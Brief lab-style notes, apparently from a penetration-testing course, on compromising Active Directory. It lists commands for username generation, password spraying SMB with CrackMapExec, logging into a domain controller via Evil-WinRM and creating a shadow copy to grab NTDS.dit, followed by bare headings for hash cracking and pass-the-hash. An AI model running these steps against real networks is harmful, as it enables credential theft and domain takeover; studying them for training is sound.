Active Directory and NTDS.dit

Username Anarchy

./username-anarchy -i /home/ltnbob/names.txt  

Attacking with CrackMapExec

$ crackmapexec smb 10.129.201.57 -u bwilliamson -p /usr/share/wordlists/fasttrack.txt

Capturing NTDS.dit

Connecting to the DC using Evil-WinRM

$ evil-winrm -i 10.129.201.57  -u bwilliamson -p 'P@55w0rd!'

Checking Local Group Membership

*Evil-WinRM* PS C:\> net localgroup

Checking User Account Privileges including Domain

*Evil-WinRM* PS C:\> net user bwilliamson

Creating Shadow Copy of C

*Evil-WinRM* PS C:\> vssadmin CREATE SHADOW /For=C:

Copying NTDS.dit from the VSS

Transferring NTDS.dit to the Attack Host

Using CrackMapExec to capture NTDS.dit

Cracking Hashes and Gaining Credentials

Pass-the-Hash using Evil-WinRM

Last updated